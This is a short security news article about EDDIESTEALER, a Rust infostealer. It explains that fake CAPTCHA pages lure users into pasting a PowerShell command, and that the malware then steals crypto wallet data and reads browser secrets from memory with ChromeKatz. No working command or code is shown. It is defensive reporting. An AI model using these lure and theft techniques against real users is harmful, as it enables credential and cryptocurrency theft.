This CAPTCHA Might Drain Your Entire Crypto Wallet

Rust-Based 'EDDIESTEALER' Malware Targets Crypto Users' Data

Cybersecurity firm Elastic Security Labs has identified a new "infostealer" malware called EDDIESTEALER, designed to steal sensitive personal data including passwords, browser information, and system credentials. What makes this threat particularly concerning is its use of the Rust programming language, which adds complexity to detection and analysis.

The attackers use a clever social engineering tactic: fake CAPTCHA verification pages on malicious websites. These pages trick users into pasting a PowerShell command that secretly downloads and executes the EDDIESTEALER binary. The malware then decrypts its core components, establishes communication with command-and-control servers, and begins scanning for cryptocurrency-related files.

EDDIESTEALER specifically targets crypto wallet data, searching for configuration files, JSON keystrokes, and other sensitive information that could give attackers access to private keys and seed phrases. This puts victims' cryptocurrency holdings at serious risk of theft.

Even more concerning, the malware can bypass encryption protections in Chromium-based browsers using the ChromeKatz tool, which extracts sensitive data directly from browser memory. This allows attackers to access encrypted passwords and session tokens that would normally be protected.

After completing its data theft, EDDIESTEALER attempts to erase itself from the infected system, making forensic investigation more difficult for security teams.